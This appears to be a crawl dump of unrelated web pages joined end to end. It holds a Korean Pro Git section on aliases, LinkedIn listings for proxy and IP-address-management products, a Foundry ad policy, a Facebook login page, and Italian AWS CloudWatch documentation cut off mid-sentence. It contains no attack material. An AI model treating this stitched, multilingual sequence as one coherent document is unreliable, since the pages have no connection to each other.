명령 7.3 Stashing과 Cleaning 7.4 내 작업에 서명하기 7.5 검색 7.6 히스토리 단장하기 7.7 Reset 명확히 알고 가기 7.8 고급 Merge 7.9 Rerere 7.10 Git으로 버그 찾기 7.11 서브모듈 7.12 Bundle 7.13 Replace 7.14 Credential 저장소 7.15 요약 8. Git맞춤 8.1 Git 설정하기 8.2 Git Attributes 8.3 Git Hooks 8.4 정책 구현하기 8.5 요약 9. Git과 여타 버전 관리 시스템 9.1 Git: 범용 Client 9.2 Git으로 옮기기 9.3 요약 10. Git의 내부 10.1 Plumbing 명령과 Porcelain 명령 10.2 Git 개체 10.3 Git Refs 10.4 Packfile 10.5 Refspec 10.6 데이터 전송 프로토콜 10.7 운영 및 데이터 복구 10.8 환경변수 10.9 요약 A1. 부록 A: 다양한 환경에서 Git 사용하기 A1.1 GUI A1.2 Visual Studio A1.3 Eclipse A1.4 Bash A1.5 Zsh A1.6 Git in Powershell A1.7 요약 A2. 부록 B: 애플리케이션에 Git 넣기 A2.1 Git 명령어 A2.2 Libgit2 A2.3 JGit A2.4 go-git A3. 부록 C: Git 명령어 A3.1 설치와 설정 A3.2 프로젝트 가져오기와 생성하기 A3.3 스냅샷 다루기 A3.4 Branch와 Merge A3.5 공유하고 업데이트하기 A3.6 보기와 비교 A3.7 Debugging A3.8 Patch 하기 A3.9 Email A3.10 다른 버전 관리 시스템 A3.11 관리 A3.12 Plumbing 명령어 2nd Edition 2.7 Git의 기초 - Git Alias Git Alias Git의 기초를 마치기 전에 Git을 좀 더 쉽고 편안하게 쓸 수 있게 만들어 줄 Alias 라는 팁 알려주려 한다. 우리는 이 책에서 이 팁을 다시 거론하지 않고 이런 팁을 알고 있다고 가정한다. 그래서 알고 있는 것이 좋다. 명령을 완벽하게 입력하지 않으면 Git은 알아듣지 못한다. Git의 명령을 전부 입력하는 것이 귀찮다면 git config 를 사용하여 각 명령의 Alias을 쉽게 만들 수 있다. 아래는 Alias을 만드는 예이다. $ git config --global alias.co checkout $ git config --global alias.br branch $ git config --global alias.ci commit $ git config --global alias.st status 이제 git commit 대신 git ci 만으로도 커밋할 수 있다. Git을 계속 사용한다면 다른 명령어도 자주 사용하게 될 것이다. 주저말고 자주 사용하는 명령은 Alias을 만들어 편하게 사용하시길 바란다. 이미 있는 명령을 편리하고 새로운 명령으로 만들어 사용할 수 있다. 예를 들어 파일을 Unstaged 상태로 변경하는 명령을 만들어서 불편함을 덜 수 있다. 아래와 같이 unstage 라는 Alias을 만든다. $ git config --global alias.unstage 'reset HEAD --' 아래 두 명령은 동일한 명령이다. $ git unstage fileA $ git reset HEAD -- fileA 한결 간결해졌다. 추가로 last 명령을 만들어 보자: $ git config --global alias.last 'log -1 HEAD' 이제 최근 커밋을 좀 더 쉽게 확인할 수 있다. $ git last commit 66938dae3329c7aebe598c2246a8e6af90d04646 Author: Josh Goebel <dreamer3@example.com> Date: Tue Aug 26 19:48:51 2008 +0800 test for current head Signed-off-by: Scott Chacon <schacon@example.com> 이것으로 쉽게 새로운 명령을 만들 수 있다. 그리고 Git의 명령어뿐만 아니라 외부 명령어도 실행할 수 있다. ! 를 제일 앞에 추가하면 외부 명령을 실행한다. 커스텀 스크립트를 만들어서 사용할 때 매우 유용하다. 아래 명령은 git visual 이라고 입력하면 gitk 가 실행된다. $ git config --global alias.visual '!gitk' prev | next About this site Patches, suggestions, and comments are welcome. Git is a member of Software Freedom Conservancy | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/smartproxy-dedicated-datacenter-proxies/?trk=products_details_guest_similar_products_section_similar_products_section_product_link_result-card_full-click | dedicated datacenter proxies | LinkedIn Skip to main content LinkedIn Decodo in Asan Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in dedicated datacenter proxies IP Address Management (IPAM) Software by Decodo See who's skilled in this Add as skill Get started Report this product About You can now own IP addresses that are solely yours! SOCKS5 and HTTP(S) proxies that no one else can lay their hands on when you’re using them. Media Products media viewer No more previous content Dedicaeted datacenter proxies Access 500K+ shared & dedicated datacenter proxies worldwide to enjoy speed and stability at an excellent price. ✅ <0.3s avg speed ✅ Rotating & static IPs ✅ 99.99% uptime ✅ SOCKS5 & HTTP(s) ✅ Best download speed retention No more next content Similar products Next-Gen IPAM Next-Gen IPAM IP Address Management (IPAM) Software AX DHCP | IP Address Management (IPAM) Software AX DHCP | IP Address Management (IPAM) Software IP Address Management (IPAM) Software Tidal LightMesh Tidal LightMesh IP Address Management (IPAM) Software ManageEngine OpUtils ManageEngine OpUtils IP Address Management (IPAM) Software Numerus Numerus IP Address Management (IPAM) Software Sign in to see more Show more Show less Decodo products All-in-One Scraping API All-in-One Scraping API Data Extraction Software datacenter proxies datacenter proxies Proxy Network Software mobile proxies mobile proxies Proxy Network Software Proxy Extension Proxy Extension Proxy Network Software residential proxies residential proxies Data Extraction Software X Browser X Browser Web Browsers Show more Show less LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English (English) Language | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/technarts-monicat/ | MoniCAT | LinkedIn Skip to main content LinkedIn TechNarts-Nart Bilişim in Asan Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in MoniCAT Network Monitoring Software by TechNarts-Nart Bilişim See who's skilled in this Add as skill Contact us Report this product About MoniCAT collects alarms by connecting NE directly through the SNMP trap method, enabling the management of NE even without an NMS, intelligently correlates them, and serves as a reliable data source for third-party systems. Besides, configuration backups are extracted periodically. Configuration Compliance Check (CCC) and difference check reports which are tailored to user-defined preferences are prepared. Additionally, MoniCAT seamlessly integrates with CMDB to deliver real-time service-based NE information, ensuring an up-to-date topology view for efficient network management and decision-making. Featured customers of MoniCAT Turkcell Telecommunications 584,615 followers Similar products NMS NMS Network Monitoring Software Network Operations Center (NOC) Network Operations Center (NOC) Network Monitoring Software Arbor Sightline Arbor Sightline Network Monitoring Software TEMS™ Suite TEMS™ Suite Network Monitoring Software Progress Flowmon Progress Flowmon Network Monitoring Software ASM ASM Network Monitoring Software Sign in to see more Show more Show less TechNarts-Nart Bilişim products Inventum Inventum Network Monitoring Software Numerus Numerus IP Address Management (IPAM) Software Redkit Redkit Software Configuration Management (SCM) Tools Star Suite Star Suite Network Monitoring Software TART TART Network Traffic Analysis (NTA) Tools Show more Show less LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English (English) Language | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/technarts-numerus?similarProducts=true&trk=products_details_guest_similar_products_section_sign_in | Numerus | LinkedIn Skip to main content LinkedIn TechNarts-Nart Bilişim in Asan Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in Numerus IP Address Management (IPAM) Software by TechNarts-Nart Bilişim See who's skilled in this Add as skill Contact us Report this product About Numerus, a mega-scale enterprise-level IP address management tool, helps simplify and automate several tasks related to IP space management. It can manage IP ranges, pools, and VLANs, monitor the hierarchy, manage utilizations and capacities, perform automated IP address assignments, and report assignments to registries with regular synchronization. It provides extensive reporting capabilities and data for 3rd party systems with various integrations. For ISPs, it also provides global IP Registry integrations such as RIPE. Featured customers of Numerus Turkcell Telecommunications 584,615 followers Similar products Next-Gen IPAM Next-Gen IPAM IP Address Management (IPAM) Software AX DHCP | IP Address Management (IPAM) Software AX DHCP | IP Address Management (IPAM) Software IP Address Management (IPAM) Software Tidal LightMesh Tidal LightMesh IP Address Management (IPAM) Software ManageEngine OpUtils ManageEngine OpUtils IP Address Management (IPAM) Software dedicated datacenter proxies dedicated datacenter proxies IP Address Management (IPAM) Software Sign in to see more Show more Show less TechNarts-Nart Bilişim products Inventum Inventum Network Monitoring Software MoniCAT MoniCAT Network Monitoring Software Redkit Redkit Software Configuration Management (SCM) Tools Star Suite Star Suite Network Monitoring Software TART TART Network Traffic Analysis (NTA) Tools Show more Show less LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English (English) Language | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/technarts-numerus/?trk=products_details_guest_other_products_by_org_section_product_link_result-card_full-click#main-content | Numerus | LinkedIn Skip to main content LinkedIn TechNarts-Nart Bilişim in Asan Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in Numerus IP Address Management (IPAM) Software by TechNarts-Nart Bilişim See who's skilled in this Add as skill Contact us Report this product About Numerus, a mega-scale enterprise-level IP address management tool, helps simplify and automate several tasks related to IP space management. It can manage IP ranges, pools, and VLANs, monitor the hierarchy, manage utilizations and capacities, perform automated IP address assignments, and report assignments to registries with regular synchronization. It provides extensive reporting capabilities and data for 3rd party systems with various integrations. For ISPs, it also provides global IP Registry integrations such as RIPE. Featured customers of Numerus Turkcell Telecommunications 584,615 followers Similar products Next-Gen IPAM Next-Gen IPAM IP Address Management (IPAM) Software AX DHCP | IP Address Management (IPAM) Software AX DHCP | IP Address Management (IPAM) Software IP Address Management (IPAM) Software Tidal LightMesh Tidal LightMesh IP Address Management (IPAM) Software ManageEngine OpUtils ManageEngine OpUtils IP Address Management (IPAM) Software dedicated datacenter proxies dedicated datacenter proxies IP Address Management (IPAM) Software Sign in to see more Show more Show less TechNarts-Nart Bilişim products Inventum Inventum Network Monitoring Software MoniCAT MoniCAT Network Monitoring Software Redkit Redkit Software Configuration Management (SCM) Tools Star Suite Star Suite Network Monitoring Software TART TART Network Traffic Analysis (NTA) Tools Show more Show less LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English (English) Language | 2026-01-13T09:29:26 |
https://foundryco.com/ad-choices/ | Foundry Ad Choices & Interest-Based Ads Policy Skip to content Search Contact us Translation available Select an experience Japan Global Search for: Search Brands CIO CSO InfoWorld Network World Computerworld Macworld PCWorld Tech Advisor TechHive ChannelWorld Specialty brands CIO100 CSO50 All brands Audiences Artificial intelligence Cloud Security Hardware Software All audiences Solutions Ads Audiences Lead gen Intent data Brand experiences Interactive storytelling Events Partner marketing Content creation Affiliate marketing All solutions Research Technology insights AI Priorities CIO Tech Priorities Cloud Computing Security Priorities State of the CIO Buying process Customer Engagement Role & Influence Partner Marketing All research Resources Resources Tools for marketers Blog Videos Customer stories Developer portal The Intersection newsletter All resources About us Press Awards Work here Privacy / Compliance Licensing About Us Brands CIO CSO InfoWorld Network World Computerworld Macworld PCWorld Tech Advisor TechHive ChannelWorld Specialty brands CIO 100 CSO50 All brands Audiences Artificial intelligence Cloud Security Hardware Software All audiences Solutions Ads Lead gen Intent data Brand experiences Interactive storytelling Events Partner marketing Content creation Affiliate marketing All solutions Research Technology insights AI Priorities CIO Tech Priorities Cloud Computing Security Priorities State of the CIO Buying process Customer Engagement Role & Influence Partner Marketing All research Resources Resources Tools for marketers Blog Videos Customer stories Developer Portal The Intersection newsletter All Resources About us Press Awards Work here Privacy / Compliance Licensing About Us Contact Log in Edition - Select an experience Japan Global About Foundry Ad Choices Foundry strives to deliver the most relevant content and ads to our readers. The advertising included on our site enables us to deliver the reporting resources required to create the high-quality journalism, research and analysis our audience expects. Advertisements displayed on our site may be based on the content of pages viewed or delivered by third parties and tailored to your interests. These third parties may also collect anonymous, non-personally identifiable information through cookies, web beacons and other technologies about your online activities on this site in order to deliver advertisements relevant to your interests. Our Policy Foundry follows the Self-Regulatory Principles for Online Behavioral advertising. More information on the principles, as well as information and choices about interest-based advertising, can be found at the Self-Regulatory Program site , including links to opt-out from services that deliver online behavioral ads. For additional information on cookies, web beacons and our collection and use of information, please read our Privacy Policy . Our brands Solutions Research Resources Events About Newsletter Contact us Work here Sitemap Topics Cookies: First-party & third-party Generative AI sponsorships Intent data IP address intelligence Reverse IP lookup Website visitor tracking Legal Terms of Service Privacy / Compliance Environmental Policy Copyright Notice Licensing CCPA IAB Europe TCF Regions ASEAN Australia & New Zealand Central Europe Germany India Middle East, Turkey, & Africa Nordics Southern Europe Western Europe Facebook Twitter LinkedIn ©2026 FoundryCo, Inc. All Rights Reserved. Privacy Policy Ad Choices Privacy Settings California: Do Not Sell My Information | 2026-01-13T09:29:26 |
https://ja-jp.facebook.com/login/?next=https%3A%2F%2Fl.facebook.com%2Fl.php%3Fu%3Dhttps%253A%252F%252Fwww.instagram.com%252F%26amp%253Bh%3DAT2FpiAS5Z4gP0BLmRzfuo4BALg9YPzbZ9ghFRCmHt3Onrjp0xwiTLO3A5FDz8P8Zb_hiTX9tVT5JFDef74sOVyazw7vZoOm5R2kajYZw6QBHjevx_fbeeJTebCYVomRxu2_hRi-_Wu4ggdu | Facebook Facebook メールアドレスまたは電話番号 パスワード アカウントを忘れた場合 新しいアカウントを作成 機能の一時停止 機能の一時停止 この機能の使用ペースが早過ぎるため、機能の使用が一時的にブロックされました。 Back 日本語 한국어 English (US) Tiếng Việt Bahasa Indonesia ภาษาไทย Español 中文(简体) Português (Brasil) Français (France) Deutsch アカウント登録 ログイン Messenger Facebook Lite 動画 Meta Pay Metaストア Meta Quest Ray-Ban Meta Meta AI Meta AIのコンテンツをもっと見る Instagram Threads 投票情報センター プライバシーポリシー プライバシーセンター Facebookについて 広告を作成 ページを作成 開発者 採用情報 Cookie AdChoices 規約 ヘルプ 連絡先のアップロードと非ユーザー 設定 アクティビティログ Meta © 2026 | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/it_it/AmazonCloudWatch/latest/monitoring/CloudWatch-InternetMonitor.html | Utilizzo di Monitor Internet - Amazon CloudWatch Utilizzo di Monitor Internet - Amazon CloudWatch Documentazione Amazon CloudWatch Guida per l’utente Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà. Utilizzo di Monitor Internet Internet Monitor offre visibilità su come i problemi di Internet influiscono sulle prestazioni e sulla disponibilità tra le applicazioni ospitate su AWS e gli utenti finali. Può ridurre il tempo necessario per diagnosticare i problemi di Internet da giorni a minuti. Internet Monitor utilizza i dati di connettività AWS acquisiti dalla sua impronta di rete globale per calcolare una base di prestazioni e disponibilità per il traffico connesso a Internet. Si tratta degli stessi dati AWS utilizzati per monitorare l'operatività e la disponibilità di Internet. Con queste misurazioni come base, Monitor Internet ti aiuta a comprendere la presenza di problemi significativi per gli utenti finali (client) nelle diverse aree geografiche in cui viene eseguita l'applicazione. Nella CloudWatch console Amazon, puoi visualizzare una visione globale dei modelli di traffico e degli eventi sanitari e approfondire facilmente le informazioni sugli eventi, con diverse granularità geografiche (località). Puoi visualizzare chiaramente l'impatto e individuare le sedi e le reti dei clienti (ASNsin genere o ISPs provider di servizi Internet) interessate. Se Internet Monitor determina che un problema di disponibilità o prestazioni di Internet è causato da un ASN specifico o dalla AWS rete, fornisce tali informazioni. Per iniziare, crea un monitor che includa una o più risorse, in modo che Internet Monitor possa creare un profilo di traffico per la tua AWS applicazione. Quindi, visualizza le informazioni sul pannello di controllo di Monitor Internet per visualizzare i dati e ottenere approfondimenti e suggerimenti sul traffico Internet dell'applicazione. Per informazioni sul supporto regionale, sui prezzi, sul funzionamento di Monitor Internet e altri contenuti generali, consulta Che cos'è Internet Monitor? . Per iniziare a utilizzare Monitor Internet, consulta Nozioni di base su Monitor Internet utilizzando la console . JavaScript è disabilitato o non è disponibile nel tuo browser. Per usare la documentazione AWS, JavaScript deve essere abilitato. Consulta le pagine della guida del browser per le istruzioni. Convenzioni dei documenti Ruoli collegati ai servizi Che cos'è Internet Monitor? Questa pagina ti è stata utile? - Sì Grazie per averci comunicato che stiamo facendo un buon lavoro! Se hai un momento, ti invitiamo a dirci che cosa abbiamo fatto che ti è piaciuto così possiamo offrirti altri contenuti simili. Questa pagina ti è stata utile? - No Grazie per averci comunicato che questa pagina ha bisogno di essere modificata. Siamo spiacenti di non aver soddisfatto le tue esigenze. Se hai un momento, ti invitiamo a dirci come possiamo migliorare la documentazione. | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/categories/ip-address-management-software?trk=products_details_guest_similar_products_section_similar_products_section_product_link_result-card_subtitle-click | Best IP Address Management (IPAM) Software | Products | LinkedIn Skip to main content LinkedIn Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in Clear text Used by Used by Network Engineer (2) Information Technology Administrator (2) Network Specialist (2) Information Technology Network Administrator (1) Information Technology Operations Analyst (1) See all products Find top products in IP Address Management (IPAM) Software category Software used to plan and manage the use of IP addresses on a network. - Use unique IP addresses for applications, devices, and related resources - Prevent conflicts and errors with automated audits and network discovery - Use IPv4/IPv6 support and integrate with DNS and DHCP services - View subnet capacity and optimize IP planning space 9 results Next-Gen IPAM IP Address Management (IPAM) Software by IPXO Next-Gen IPAM is designed to simplify and automate public IP resource management. It supports both IPv4 and IPv6, and is built with a focus on automation, transparency, and security. You get a centralized view of IP reputation, WHOIS data, RPKI validation, BGP routing, and geolocation – all in one automated platform. View product AX DHCP | IP Address Management (IPAM) Software IP Address Management (IPAM) Software by Axiros AX DHCP server is a clusterable carrier-grade DHCP / IPAM (IP Address Management) solution that can be seamlessly integrated within given provisioning platforms. AX DHCP copes with FttH, ONT provisioning, VOIP and IPTV services. Telecommunications carriers and internet service providers (ISPs) need powerful and robust infrastructure that supports future workloads. DDI (DNS-DHCP-IPAM) is a critical networking technology for every service provider that ensures customer services availability, security and performance. View product Tidal LightMesh IP Address Management (IPAM) Software by Tidal Go beyond IP Address Management (IPAM) with LightMesh from Tidal. Simplify and automate the administration and management of internet protocol networks. LightMesh makes IP visibility and operation scalable, secure and self-controlled with a central feature-rich interface, reducing complexity, and – all for free. Currently in Public Beta. View product ManageEngine OpUtils IP Address Management (IPAM) Software by ManageEngine ITOM OpUtils is an IP address and switch port management software that is geared towards helping engineers efficiently monitor, diagnose, and troubleshoot IT resources. OpUtils complements existing management tools by providing troubleshooting and real-time monitoring capabilities. It helps network engineers manage their switches and IP address space with ease. With a comprehensive set of over 20 tools, this switch port management tool helps with network monitoring tasks like detecting a rogue device intrusion, keeping an eye on bandwidth usage, monitoring the availability of critical devices, backing up Cisco configuration files, and more. View product Numerus IP Address Management (IPAM) Software by TechNarts-Nart Bilişim Numerus, a mega-scale enterprise-level IP address management tool, helps simplify and automate several tasks related to IP space management. It can manage IP ranges, pools, and VLANs, monitor the hierarchy, manage utilizations and capacities, perform automated IP address assignments, and report assignments to registries with regular synchronization. It provides extensive reporting capabilities and data for 3rd party systems with various integrations. For ISPs, it also provides global IP Registry integrations such as RIPE. View product Find products trusted by professionals in your network See which products are used by connections in your network and those that share similar job titles Sign in to view full insights dedicated datacenter proxies IP Address Management (IPAM) Software by Decodo You can now own IP addresses that are solely yours! SOCKS5 and HTTP(S) proxies that no one else can lay their hands on when you’re using them. View product AX DHCP | Gerenciamento de endereços IP IP Address Management (IPAM) Software by Axiros LATAM O AX DHCP é uma solução DHCP/IPAM que pode ser integrada de forma transparente em determinadas plataformas de provisionamento como FTTH, ONT, VOIP e IPTV. As operadoras de telecomunicações e os provedores de serviços de Internet precisam de uma infraestrutura poderosa e robusta que suporte cargas de trabalho futuras. DDI (DNS-DHCP-IPAM) é uma tecnologia de rede crítica para provedores de serviços que garante a disponibilidade, segurança e desempenho dos serviços ao cliente. … AX DHCP es una solución DHCP/IPAM que se puede integrar perfectamente en determinadas plataformas de aprovisionamiento como FTTH, ONT, VOIP e IPTV. Los operadores de telecomunicaciones y los proveedores de servicios de Internet necesitan una infraestructura potente y robusta para admitir futuras cargas de trabajo. DDI (DNS-DHCP-IPAM) es una tecnología de red fundamental para proveedores de servicios que garantiza la disponibilidad, la seguridad y el rendimiento de los servicios al cliente. View product Cygna runIP Appliance Platform IP Address Management (IPAM) Software by Cygna Labs Deutschland Maximizing the benefits of your DDI-Solution VitalQIP (Nokia) | DiamondIP (BT DiamondIP) | Micetro (Men & Mice) By providing an efficient solution for roll-out, configuration, patching and upgrades of DNS and DHCP servers, the runIP Management Platform optimizes the efficiency and value of your DDI investment. To create runIP, N3K combined the experience gained from setting up thousands of DNS & DHCP servers and hundreds of DDI environments into one holistic solution. runIP is suitable both for those companies that want to further reduce the operating costs of their existing DDI installation and for those that want to make their initial installation or further roll-out even more efficient and successful. The runIP solution is completed by its integrated, comprehensive real-time monitoring of the DNS and DHCP services and operating system and extensive long-term statistics. This ensures that you always have an overview of the DNS and DHCP services as well as the operating system. View product See more How it works Explore Discover the best product for your need from a growing catalog of 25,000 products and categories trusted by LinkedIn professionals Learn Evaluate new tools, explore trending products in your industry and see who in your network is skilled in the product Grow Join communities of product users to learn best practices, celebrate your progress and accelerate your career LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English Language | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/it_it/AmazonCloudWatch/latest/monitoring/GettingSetup.html | Configurazione delle impostazioni - Amazon CloudWatch Configurazione delle impostazioni - Amazon CloudWatch Documentazione Amazon CloudWatch Guida per l’utente Registrati per un Account AWS Crea un utente con accesso amministrativo Accedi alla CloudWatch console Amazon Configura il AWS CLI Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà. Configurazione delle impostazioni Per utilizzare Amazon CloudWatch è necessario un AWS account. Il tuo AWS account ti consente di utilizzare servizi (ad esempio Amazon EC2) per generare metriche che puoi visualizzare nella CloudWatch console, un'interfaccia point-and-click basata sul Web. Inoltre, è possibile installare e configurare l'interfaccia a riga di AWS comando (CLI). Registrati per un Account AWS Se non ne hai uno Account AWS, completa i seguenti passaggi per crearne uno. Per iscriverti a un Account AWS Apri la https://portal.aws.amazon.com/billing/registrazione. Segui le istruzioni online. Nel corso della procedura di registrazione riceverai una telefonata o un messaggio di testo e ti verrà chiesto di inserire un codice di verifica attraverso la tastiera del telefono. Quando ti iscrivi a un Account AWS, Utente root dell'account AWS viene creato un. L’utente root dispone dell’accesso a tutte le risorse e tutti i Servizi AWS nell’account. Come best practice di sicurezza, assegna l’accesso amministrativo a un utente e utilizza solo l’utente root per eseguire attività che richiedono l’accesso di un utente root . AWS ti invia un'email di conferma dopo il completamento della procedura di registrazione. In qualsiasi momento, puoi visualizzare l'attività corrente del tuo account e gestirlo accedendo a https://aws.amazon.com/ e scegliendo Il mio account . Crea un utente con accesso amministrativo Dopo esserti registrato Account AWS, proteggi Utente root dell'account AWS AWS IAM Identity Center, abilita e crea un utente amministrativo in modo da non utilizzare l'utente root per le attività quotidiane. Proteggi i tuoi Utente root dell'account AWS Accedi Console di gestione AWS come proprietario dell'account scegliendo Utente root e inserendo il tuo indirizzo Account AWS email. Nella pagina successiva, inserisci la password. Per informazioni sull’accesso utilizzando un utente root, consulta la pagina Signing in as the root user della Guida per l’utente di Accedi ad AWS . Abilita l’autenticazione a più fattori (MFA) per l’utente root. Per istruzioni, consulta Abilitare un dispositivo MFA virtuale per l'utente Account AWS root (console) nella Guida per l' utente IAM . Crea un utente con accesso amministrativo Abilita il Centro identità IAM. Per istruzioni, consulta Abilitazione del AWS IAM Identity Center nella Guida per l’utente di AWS IAM Identity Center . Nel Centro identità IAM, assegna l’accesso amministrativo a un utente. Per un tutorial sull'utilizzo di IAM Identity Center directory come fonte di identità, consulta Configurare l'accesso utente con l'impostazione predefinita IAM Identity Center directory nella Guida per l'AWS IAM Identity Center utente . Accesso come utente amministratore Per accedere come utente del Centro identità IAM, utilizza l’URL di accesso che è stato inviato al tuo indirizzo e-mail quando hai creato l’utente del Centro identità IAM. Per informazioni sull'accesso utilizzando un utente IAM Identity Center, consulta AWS Accedere al portale di accesso nella Guida per l'Accedi ad AWS utente . Assegnazione dell’accesso ad altri utenti Nel Centro identità IAM, crea un set di autorizzazioni conforme alla best practice per l’applicazione di autorizzazioni con il privilegio minimo. Segui le istruzioni riportate nella pagina Creazione di un set di autorizzazioni nella Guida per l’utente di AWS IAM Identity Center . Assegna al gruppo prima gli utenti e poi l’accesso con autenticazione unica (Single Sign-On). Per istruzioni, consulta Aggiungere gruppi nella Guida per l’utente di AWS IAM Identity Center . Accedi alla CloudWatch console Amazon Per accedere alla CloudWatch console Amazon Apri la CloudWatch console all'indirizzo https://console.aws.amazon.com/cloudwatch/ . Se necessario, usa la barra di navigazione per cambiare la regione con la regione in cui hai AWS le tue risorse. Anche se è la prima volta che utilizzi la CloudWatch console, Your Metrics potrebbe già riportare le metriche, perché hai utilizzato un AWS prodotto che invia automaticamente le metriche ad Amazon CloudWatch gratuitamente. Altri servizi richiedono l'abilitazione dei parametri. Se non disponi di alcun allarme, la sezione Your Alarms (I tuoi allarmi) presenterà un pulsante Create Alarm (Crea allarme). Configura il AWS CLI Puoi utilizzare AWS CLI o l'Amazon CloudWatch CLI per eseguire CloudWatch i comandi. Tieni presente che AWS CLI sostituisce la CloudWatch CLI; includiamo CloudWatch nuove funzionalità solo in. AWS CLI Per informazioni su come installare e configurare AWS CLI, vedere Getting Set Up with the AWS Command Line Interface nella Guida per l' AWS Command Line Interface utente . Per informazioni su come installare e configurare Amazon CloudWatch CLI, consulta Configurare l'interfaccia a riga di comando nell' Amazon CLI CloudWatch Reference. JavaScript è disabilitato o non è disponibile nel tuo browser. Per usare la documentazione AWS, JavaScript deve essere abilitato. Consulta le pagine della guida del browser per le istruzioni. Convenzioni dei documenti Che cos'è Amazon CloudWatch? Analisi, ottimizzazione e riduzione dei costi CloudWatch Questa pagina ti è stata utile? - Sì Grazie per averci comunicato che stiamo facendo un buon lavoro! Se hai un momento, ti invitiamo a dirci che cosa abbiamo fatto che ti è piaciuto così possiamo offrirti altri contenuti simili. Questa pagina ti è stata utile? - No Grazie per averci comunicato che questa pagina ha bisogno di essere modificata. Siamo spiacenti di non aver soddisfatto le tue esigenze. Se hai un momento, ti invitiamo a dirci come possiamo migliorare la documentazione. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/it_it/AmazonCloudWatch/latest/monitoring/CloudWatch-Cross-Account-Methods.html | Monitoraggio per account e Regioni differenti - Amazon CloudWatch Monitoraggio per account e Regioni differenti - Amazon CloudWatch Documentazione Amazon CloudWatch Guida per l’utente Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà. Monitoraggio per account e Regioni differenti Per abilitare il monitoraggio unificato tra gli account, CloudWatch offre le seguenti funzionalità: CloudWatchosservabilità tra account: facilita l'osservabilità all'interno di una singola regione con il servizio Observability Access Manager (OAM). Puoi collegare gli account e visualizzare facilmente metriche, log, tracce e altri dati di telemetria per account differenti. In questo modo, gli account di monitoraggio centralizzati dispongono di un'osservabilità unificata, potendo visualizzare la telemetria condivisa dagli account di origine e utilizzarla come se fosse nativa dell'account di monitoraggio. Console interregionale: offre un'esperienza di CloudWatch console che consente di visualizzare dashboard, metriche e console di allarmi di altri account in tutte le regioni passando da un account all'altro. Dopo aver impostato le autorizzazioni necessarie, si utilizza un selettore di account integrato nelle console di allarmi, pannelli di controllo e metriche per visualizzare metriche, pannelli di controllo e allarmi in altri account senza dover effettuare l'accesso e la disconnessione dagli account. Inoltre, abilitando questa funzionalità, è possibile configurare pannelli di controllo che contengono le metriche per tutti gli account e tutte le Regioni per una visibilità centralizzata all'interno di un account. Centralizzazione dei log su tutti gli account e tutte le Regioni : raccoglie copie dei dati di log da più account membri in un unico archivio di dati utilizzando regole di centralizzazione su tutti gli account e tutte le Regioni. Sei tu a definire le regole che replicano automaticamente i dati di registro da più account in un account centralizzato all'interno dell'organizzazione. Regioni AWS Questa funzionalità semplifica il consolidamento dei log per migliorare il monitoraggio, l'analisi e la conformità centralizzati sull'intera infrastruttura. AWS Queste tre funzionalità sono complementari tra loro e possono essere utilizzate indipendentemente o insieme. Per un confronto delle funzionalità, consulta la tabella seguente. Ti consigliamo di utilizzare l'osservabilità CloudWatch tra account per la più ricca esperienza di osservabilità e scoperta tra account all'interno di una regione per le tue metriche, i log e le tracce. CloudWatch osservabilità tra account Console per più account e più regioni CloudWatch Centralizzazione dei log per tutti gli account e tutte le Regioni Di cosa si tratta? Accesso unificato alla telemetria sottostante e ad altre risorse di osservabilità su più account. Dopo la configurazione, le risorse di osservabilità sono facilmente visualizzabili tra account differenti, eliminando la necessità di assumere ruoli specifici. L'account di monitoraggio centrale ottiene l'accesso diretto ai dati e alle risorse di telemetria dagli account di origine, semplificando il processo di monitoraggio e osservabilità. Un account di monitoraggio designato presuppone un account di origine CrossAccountSharingRole definito dalla CloudWatch console. Assumendo questo ruolo, l'account di monitoraggio può invocare, direttamente dalla sua console, operazioni come la visualizzazione del pannello di controllo per conto degli account di origine. La funzionalità di centralizzazione dei dati di Amazon CloudWatch Logs semplifica il consolidamento dei log per migliorare il monitoraggio, l'analisi e la conformità centralizzati nell'intera infrastruttura. AWS Come funziona? Un account di monitoraggio che utilizza il servizio Observability Access Monitoring crea un sink e gli associa una policy di sink. La policy di sink definisce quali risorse desiderano visualizzare e quali account di origine devono condividerle. Dopodiché, gli account di origine possono creare un collegamento al sink dell'account di monitoraggio, stabilendo cosa vogliono effettivamente condividere. Dopo la creazione del collegamento, le risorse specificate sono visibili nell'account di monitoraggio. Un account di origine avvia la configurazione impostando un CrossAccountSharingRole account di monitoraggio che consente a un account di monitoraggio di eseguire operazioni nell'account di origine. Dopodiché, un account di 